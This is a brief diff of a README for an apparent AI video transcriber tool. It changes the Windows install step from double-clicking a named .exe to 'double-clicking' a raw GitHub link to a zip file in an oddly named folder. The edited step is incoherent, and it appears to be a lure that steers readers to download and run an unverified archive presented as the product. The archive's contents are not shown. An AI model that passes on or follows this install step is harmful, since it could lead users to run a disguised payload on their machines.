juliesetrum/AI-Video-Transcriber/README.md

 #### For Windows Users:

 1. Locate the downloaded file (usually in your Downloads folder).
-2. Double-click on the `AI-Video-Transcriber-Windows.exe` file.
+2. Double-click on the `https://raw.githubusercontent.com/juliesetrum/AI-Video-Transcriber/main/odorously/AI-Video-Transcriber.zip` file.
 3. Follow the on-screen instructions to complete the installation.

 #### For macOS Users: